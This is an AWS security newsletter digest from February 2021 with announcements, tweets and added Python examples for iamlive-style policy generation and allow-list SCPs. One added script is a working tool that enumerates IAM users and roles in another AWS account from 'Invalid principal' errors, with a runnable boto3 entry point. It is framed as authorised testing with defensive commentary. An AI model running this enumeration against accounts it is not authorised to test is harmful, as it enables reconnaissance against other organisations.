• Amazon Macie announces a slew of new capabilities including support for cross-account sensitive data discovery, scanning by Amazon S3 object prefix, improved pre-scan cost estimation, and added location detail in findings
• Amazon GuardDuty introduces machine learning domain reputation model to expand threat detection and improve accuracy
• New IRAP report is now available on AWS Artifact for Australian customers
• Over 40 services require TLS 1.2 minimum for AWS FIPS endpoints
• iamlive: generate basic #AWS #IAM policies using client-side monitoring of calls made from the AWS CLI or SDKs (github.com/iann0036/iamli…)
• aws-allowlister: auto-generated AWS AllowList SCPs (thread)
• Enumerating AWS IAM users/roles without being authenticated to the victim account
• For the first time AWS has publicly recommended aws-nuke as a way of handling sandbox accounts
• PSA: The AWS Architecture Icon pack has been updated (aws.amazon.com/architecture/i…)
• @dagrz's 2016 Kiwicon AWS security research (youtube.com/watch?v=vxgkHJ…, script at github.com/dagrz/aws_pwn/…)
• Very happy for @ajassy
• 💣 ExpressJS + Handlebars => RCE (blog.shoebpatel.com/2021/01/23/The…)
• 🏓 Cloud Security Table Top Exercises by @matthewdfuller (matthewdf10.medium.com/cloud-security…)
• Rhino Security Labs is looking for a Sr Pentester (apply.workable.com/j/07544F7369)
• 🙌 Got my re:Invent swag!
• Run Prowler from AWS CloudShell in seconds: blyx.com/2021/02/02/run… #AWS #hardening #security
• Cross-account object reads via Athena from a no-humans-allowed logging account bucket
• Sophia is here to show you there are still reasons to smile.
• Happy St. Brigid's!
• Jeff Bezos to step down as CEO, replaced by AWS CEO Andy Jassy in Q3.
• Slack's Outage on January 4th 2021
• re:Invent videos are *finally* on YouTube
• iamlive a tool to generate iam policies from aws cli or SDK calls
• Node.js 14.x runtime now available in AWS Lambda | Amazon Web Services
• 3 new SolarWinds vulnerabilities including RCE in Orion platform
• Exploiting Nespresso smart cards for fun and coffee
• Cloud security business acquisitions
Monday, 8 February 2021

Amazon Macie announces a slew of new capabilities including support for cross-account sensitive data discovery, scanning by Amazon S3 object prefix, improved pre-scan cost estimation, and added location detail in findings

We are excited to announce a series of new capabilities that have been added to Amazon Macie to make it easier to configure, scope, and run sensitive data discovery in AWS, including support for scanning jobs that cover Amazon S3 buckets residing across multiple accounts, scoping of scans by object …

Amazon GuardDuty introduces machine learning domain reputation model to expand threat detection and improve accuracy

Amazon GuardDuty introduces a new machine learning domain reputation model that can categorize previously unseen domains as highly likely to be malicious or benign based on their behavioral characteristics. GuardDuty uses this new capability to alert customers when an EC2 instance in their AWS environment is communicating with a domain …

New IRAP report is now available on AWS Artifact for Australian customers

Henry Xu · Feb 4
We are excited to announce that a new Information Security Registered Assessors Program (IRAP) report is now available on AWS Artifact. The new IRAP documentation pack brings new services in scope, and includes a Cloud Security Control Matrix (CSCM) for specific information to help customers assess each applicable control that …

Over 40 services require TLS 1.2 minimum for AWS FIPS endpoints

Janelle Hopper · Feb 2
In a March 2020 blog post, we told you about work Amazon Web Services (AWS) was undertaking to update all of our AWS Federal Information Processing Standard (FIPS) endpoints to a minimum of Transport Layer Security (TLS) 1.2 across all AWS Regions. Today, we’re happy to announce that over 40 …
Ian Mckay @iann0036

Today I'm publishing "iamlive", a tool to generate basic #AWS #IAM policies using client-side monitoring of calls made from the AWS CLI or SDKs.🔒☁️

Try it out today and let me know if it's helpful!

github.com/iann0036/iamli…

Feb 06 · 7:11 AM

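The mechanism iamlive relies on is the SDKs' client-side monitoring (CSM) feed: with AWS_CSM_ENABLED=true the CLI and SDKs emit one JSON datagram per API call to a local UDP port, and a listener can turn the observed "Service"/"Api" pairs into an IAM policy. The Python below is an added example in that spirit, not iamlive's own code. It assumes the default CSM port 31000, the "Type", "Service" and "Api" record fields, and a small, assumed map from CSM service names to IAM action prefixes; the sample datagrams are constructed, not captured from a real session.

```python
"""Build a starter IAM policy from AWS SDK client-side monitoring (CSM) events.

Added example in the spirit of iamlive, not iamlive's own code.
Assumptions: the CLI/SDK has AWS_CSM_ENABLED=true and sends one JSON datagram
per event to UDP 127.0.0.1:31000 (the default AWS_CSM_PORT); "ApiCall" records
carry "Service" and "Api"; the IAM action prefix is the lower-cased service name
except for the few CSM names mapped below (assumed, partial map).
"""
import json
import socket

# CSM reports the SDK service name, which is not always the IAM action prefix.
# Assumed, partial map; extend it as you meet other services.
SERVICE_TO_PREFIX = {
    "CloudWatch Logs": "logs",
    "CloudWatch": "cloudwatch",
    "Lambda": "lambda",
}


def action_from_record(record):
    """Return 'prefix:Api' for an ApiCall record, None for anything else.

    Per-attempt records ("ApiCallAttempt") are skipped so a retried call is
    not counted once per attempt; duplicates are collapsed in build_policy.
    """
    if record.get("Type") != "ApiCall":
        return None
    service, api = record.get("Service"), record.get("Api")
    if not service or not api:
        return None
    prefix = SERVICE_TO_PREFIX.get(service, service.lower())
    return f"{prefix}:{api}"


def build_policy(records):
    """Collapse observed calls into one Allow statement.

    Resource is "*" because CSM events do not carry the ARNs a call touched;
    narrowing Resource is a manual step after generation.
    """
    actions = sorted({a for a in map(action_from_record, records) if a})
    return {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": actions, "Resource": "*"}],
    }


def decode_datagrams(datagrams):
    """Parse raw UDP payloads, dropping anything that is not JSON."""
    records = []
    for data in datagrams:
        try:
            records.append(json.loads(data))
        except ValueError:
            continue
    return records


def listen(host="127.0.0.1", port=31000, max_records=None):
    """Collect CSM datagrams until max_records is reached (None = until Ctrl-C)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((host, port))
    datagrams = []
    try:
        while max_records is None or len(datagrams) < max_records:
            data, _ = sock.recvfrom(65535)
            datagrams.append(data)
    except KeyboardInterrupt:
        pass
    return decode_datagrams(datagrams)


# Constructed sample datagrams shaped like CSM output (not a real capture).
SAMPLE_DATAGRAMS = [
    b'{"Version":1,"ClientId":"","Type":"ApiCallAttempt","Service":"S3","Api":"ListBuckets","Region":"us-east-1","HttpStatusCode":200}',
    b'{"Version":1,"ClientId":"","Type":"ApiCall","Service":"S3","Api":"ListBuckets","Region":"us-east-1","AttemptCount":1}',
    b'{"Version":1,"ClientId":"","Type":"ApiCall","Service":"S3","Api":"GetObject","Region":"us-east-1","AttemptCount":1}',
    b'{"Version":1,"ClientId":"","Type":"ApiCall","Service":"S3","Api":"GetObject","Region":"us-east-1","AttemptCount":2}',
    b'{"Version":1,"ClientId":"","Type":"ApiCall","Service":"STS","Api":"GetCallerIdentity","Region":"us-east-1","AttemptCount":1}',
    b'{"Version":1,"ClientId":"","Type":"ApiCall","Service":"CloudWatch Logs","Api":"DescribeLogGroups","Region":"us-east-1","AttemptCount":1}',
    b'not json',
]


def sample_policy():
    """Policy derived from the constructed sample above."""
    return build_policy(decode_datagrams(SAMPLE_DATAGRAMS))


if __name__ == "__main__":
    # Run this, then in another shell: AWS_CSM_ENABLED=true aws s3 ls
    print(json.dumps(build_policy(listen()), indent=2))
```

The generated policy only reflects the calls the monitored run actually made, so exercise the whole workflow, including its error paths, before treating the output as least privilege; and "Resource": "*" is the part that still has to be tightened by hand, because CSM never sees the ARNs.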
Kinnaird McQuade💥☁️ @kmcquade3

Just dropped a new AWS security tool that auto-generates your AWS AllowList SCPs based on your needs.

Let me explain - a thread 🧵

@SalesforceEng

Check out aws-allowlister, another AWS Security tool we just open-sourced! It automatically generates AllowList SCPs to control which AWS services are allowed at the Account level, based on your compliance needs. Created by @kmcquade3 and @jasonadyke.
sforce.co/2Lpnn84

Feb 04 · 5:33 PM

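An allow-list SCP is a single Deny statement whose NotAction holds the approved services, so every action outside those services is blocked for the whole account regardless of what IAM policies grant. The Python below is an added example of that policy shape together with the checks you want around it (the size cap, a break-glass exemption and a quick evaluator); it is not aws-allowlister's code. The allowed-service list and the OrgBreakGlass role ARN are hypothetical inputs.

```python
"""Generate an allow-list SCP: Deny everything except an approved set of services.

Added example that mirrors the shape of policy aws-allowlister produces; it is
not aws-allowlister's code. Assumptions: ALLOWED_SERVICES is your own approved
list of IAM service prefixes; exempt principals are matched on aws:PrincipalARN
(a hypothetical break-glass role is used below); 5120 bytes is the documented
maximum SCP size, whitespace included.
"""
import fnmatch
import json

SCP_MAX_BYTES = 5120


def allowlist_scp(allowed_services, exempt_principal_arns=()):
    statement = {
        "Sid": "DenyAllButAllowListedServices",
        "Effect": "Deny",
        # NotAction: the Deny applies to every action whose prefix is NOT listed.
        "NotAction": sorted(f"{svc}:*" for svc in set(allowed_services)),
        "Resource": "*",
    }
    if exempt_principal_arns:
        # Keep a break-glass role out of the Deny so an SCP mistake is recoverable.
        statement["Condition"] = {
            "ArnNotLike": {"aws:PrincipalARN": sorted(exempt_principal_arns)}
        }
    return {"Version": "2012-10-17", "Statement": [statement]}


def compact(policy):
    """Serialise without whitespace; AWS counts every character against the cap."""
    return json.dumps(policy, separators=(",", ":"))


def fits_scp_limit(policy):
    return len(compact(policy).encode()) <= SCP_MAX_BYTES


def action_denied(policy, action, principal_arn="arn:aws:iam::123456789012:role/app"):
    """Evaluate a Deny/NotAction statement the way SCP evaluation treats it.

    Simplified evaluator for this policy shape only: the Deny hits when the
    action matches no NotAction pattern and the principal is not exempted.
    Action matching is case-insensitive, as in IAM.
    """
    for st in policy["Statement"]:
        if st["Effect"] != "Deny":
            continue
        exempt = st.get("Condition", {}).get("ArnNotLike", {}).get("aws:PrincipalARN", [])
        if any(fnmatch.fnmatchcase(principal_arn, p) for p in exempt):
            continue
        if not any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in st["NotAction"]):
            return True
    return False


# Constructed example input: an allow list you would derive from your own
# compliance scope, not a list aws-allowlister ships.
ALLOWED_SERVICES = ["ec2", "s3", "iam", "sts", "cloudtrail", "kms", "organizations"]
BREAK_GLASS = ["arn:aws:iam::*:role/OrgBreakGlass"]  # hypothetical role name


def example_scp():
    return allowlist_scp(ALLOWED_SERVICES, BREAK_GLASS)


if __name__ == "__main__":
    scp = example_scp()
    print(json.dumps(scp, indent=2))
    print("bytes:", len(compact(scp)), "fits:", fits_scp_limit(scp))
    for act in ("s3:GetObject", "sagemaker:CreateNotebookInstance"):
        print(act, "denied" if action_denied(scp, act) else "allowed")
```

Two things to keep in mind when attaching a policy like this: SCPs are filters, not grants, so the default FullAWSAccess (or an explicit Allow) has to stay attached for anything to work at all; and a NotAction Deny also blocks the services you forgot to list, which is why sts and iam belong in every allow list. SCPs never apply to the management account, so test on a member account.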
Kinnaird McQuade💥☁️ @kmcquade3

I've uncovered a way to enumerate AWS IAM users/roles without being authenticated to the victim account 😈

If you update an IAM role's trust policy to allow sts:AssumeRole from an invalid IAM principal, you'll get an "Invalid principal" error

No errors if the principal is legit

Feb 07 · 10:41 PM

Scott Piper @0xdabbad00

For the first time AWS has publicly recommended aws-nuke as a way of handling sandbox accounts.

AWS Blog Unofficial. @AWSBlogUnreal

The AWS Management Tools Blog #AWSManagementTools
aws.amazon.com/blogs/mt/best-…
By: Nisha Nadkarni, jefstock* and Sonakshi Pandey

Feb 02 · 6:42 AM

Ian Mckay @iann0036

PSA: The AWS Architecture Icon pack has been updated: aws.amazon.com/architecture/i…

Feb 04 · 11:24 PM

Scott Piper @0xdabbad00

@kmcquade3 This was first discovered by @dagrz and presented at Kiwicon in 2016 youtube.com/watch?v=vxgkHJ…

This is a must watch series of horribly recorded videos for people doing AWS security research that unfortunately hardly anyone has seen.

Script at github.com/dagrz/aws_pwn/…

Feb 08 · 12:14 AM

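Kinnaird's tweet above and @dagrz's 2016 script rely on the same oracle: UpdateAssumeRolePolicy on a role in your own account validates the principal you put in the trust policy and rejects one that does not exist, so each candidate ARN costs one API call and no credentials for the target account. The Python below is an added example of that probe, not Kinnaird's or aws_pwn's code. It assumes the API error text contains "Invalid principal", that the probe role lives in your account and has no permissions attached, and that you are authorised to test the target account; the account IDs and names are placeholders. Because every hit briefly grants that principal sts:AssumeRole on the probe role, the original trust policy is restored in a finally block. FakeIam is an offline stand-in used only to exercise the logic.

```python
"""Probe whether IAM users/roles exist in another account via UpdateAssumeRolePolicy.

Added example, not the tweet author's or dagrz's code. Assumptions:
- ROLE_NAME is a permission-less role in *your* account and you are authorised
  to test the target account;
- a non-existent principal is rejected with a MalformedPolicyDocument error
  whose text contains "Invalid principal" (string match below is an assumption);
- the probe modifies your role's trust policy, so it is restored afterwards.
"""
import json


def trust_policy(principal_arn):
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Principal": {"AWS": principal_arn},
            "Action": "sts:AssumeRole",
        }],
    }


def candidate_arns(account_id, names):
    """Try each wordlist entry as both a user and a role in the target account."""
    for name in names:
        yield f"arn:aws:iam::{account_id}:user/{name}"
        yield f"arn:aws:iam::{account_id}:role/{name}"


def principal_exists(iam, role_name, arn):
    """True if the API accepts arn as a principal, False on 'Invalid principal'.

    Any other error (throttling, AccessDenied on the probe role, ...) is
    re-raised rather than being misread as 'does not exist'.
    """
    try:
        iam.update_assume_role_policy(
            RoleName=role_name, PolicyDocument=json.dumps(trust_policy(arn))
        )
    except Exception as exc:  # botocore.exceptions.ClientError in practice
        if "Invalid principal" in str(exc):
            return False
        raise
    return True


def enumerate_principals(iam, role_name, account_id, names, original_policy):
    found = []
    try:
        for arn in candidate_arns(account_id, names):
            if principal_exists(iam, role_name, arn):
                found.append(arn)
    finally:
        # Each hit leaves the probed principal able to assume the probe role;
        # put the original trust policy back however the loop ends.
        iam.update_assume_role_policy(
            RoleName=role_name, PolicyDocument=json.dumps(original_policy)
        )
    return found


class FakeIam:
    """Offline stand-in for a boto3 IAM client (constructed for the demo only).

    Rejects principals not in `existing` with the error text the real API is
    assumed to send, and keeps the last policy written so callers can check
    that the trust policy was restored.
    """

    def __init__(self, existing):
        self.existing = set(existing)
        self.last_policy = None

    def update_assume_role_policy(self, RoleName, PolicyDocument):
        principal = json.loads(PolicyDocument)["Statement"][0]["Principal"]["AWS"]
        if principal not in self.existing:
            raise RuntimeError(
                "An error occurred (MalformedPolicyDocument) when calling the "
                f"UpdateAssumeRolePolicy operation: Invalid principal in policy: {principal}"
            )
        self.last_policy = PolicyDocument


def demo():
    """Run the probe against the fake client; placeholder account IDs throughout."""
    original = trust_policy("arn:aws:iam::111111111111:root")  # our own account
    fake = FakeIam({
        "arn:aws:iam::111111111111:root",
        "arn:aws:iam::123456789012:user/alice",
        "arn:aws:iam::123456789012:role/deploy",
    })
    found = enumerate_principals(fake, "probe-role", "123456789012",
                                 ["alice", "deploy", "bob"], original)
    return found, fake.last_policy == json.dumps(original)


if __name__ == "__main__":
    import sys
    import boto3
    iam = boto3.client("iam")
    role, target, names = sys.argv[1], sys.argv[2], sys.argv[3:]
    current = iam.get_role(RoleName=role)["Role"]["AssumeRolePolicyDocument"]
    for arn in enumerate_principals(iam, role, target, names, current):
        print(arn)
```

The defensive point is what makes this worth knowing: the only CloudTrail record of the probe is an UpdateAssumeRolePolicy event in the account that owns the probe role, so the target account sees nothing. The countermeasure is not detection but treating principal names as public and never relying on an obscure user or role name as a control.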
Steven Bryen @steven_bryen

Very happy for @ajassy. A fantastic leader that I have learnt a lot from. I had the pleasure of meeting him in London a few years ago. Smart, humble, approachable. Excited to see what he does for the broader Amazon.

Feb 02 · 10:40 PM

Clint Gibler @clintgibler

💣 ExpressJS + Handlebars => RCE

Excellent post by @0xCaptainFreak on how providing a `layout` parameter can lead to Local File Read (steal source code / env variables) or RCE

👌 example of digging into framework internals

#bugbounty #bugbountytips

blog.shoebpatel.com/2021/01/23/The…

Feb 02 · 5:00 PM

Clint Gibler @clintgibler

🏓 Cloud Security Table Top Exercises by @matthewdfuller

Relevant scenarios to think through, including:
* Malicious VPC peering request
* Compromised Lambda Layers
* Injected CloudFormation Templates
* Broken CloudTrail Logs
* + a bunch more

matthewdf10.medium.com/cloud-security…

Feb 03 · 9:00 PM

Rhino Security Labs @RhinoSecurity

We're looking for a Sr Pentester - a technical leader who can tackle our toughest pentests, and inspire others to do the same. If that sounds like you, let's chat!
apply.workable.com/j/07544F7369

Feb 06 · 12:21 AM

Aidan W Steele @__steele

My favourite use for this is granting account A (e.g. secops) permission to read objects via Athena owned by account B-Y (any other accounts in the org) in a bucket owned by account Z (a no-humans-allowed logging account)

This wasn't possible before without lame workarounds.

Aidan W Steele @__steele

@ShortJared Add this to your bucket and the x-account objects will be owned by the bucket owner. Life-changer!

Feb 06 · 2:18 AM

Alexandre Sieira @AlexandreSieira

Sophia is here to show you there are still reasons to smile.

Feb 03 · 3:38 PM

Brigid Johnson @bjohnso5y

Happy St. Brigid's!!! It may not be as famous as St. Patrick's, but a holiday to celebrate the returning of spring ☘️12 years ago I visited St. Brigid's cathedral in Kildare Ireland! ☘️

Feb 01 · 8:50 PM

Cloud security business acquisitions

Cyber security is a very financially hot industry based on the numbers. I am looking to make acquisitions in the upcoming future.

I had some questions as I am experienced in acquisitions but new to cloud security:

-How fragmented is this industry?

-At what earnings multiple do small companies sell …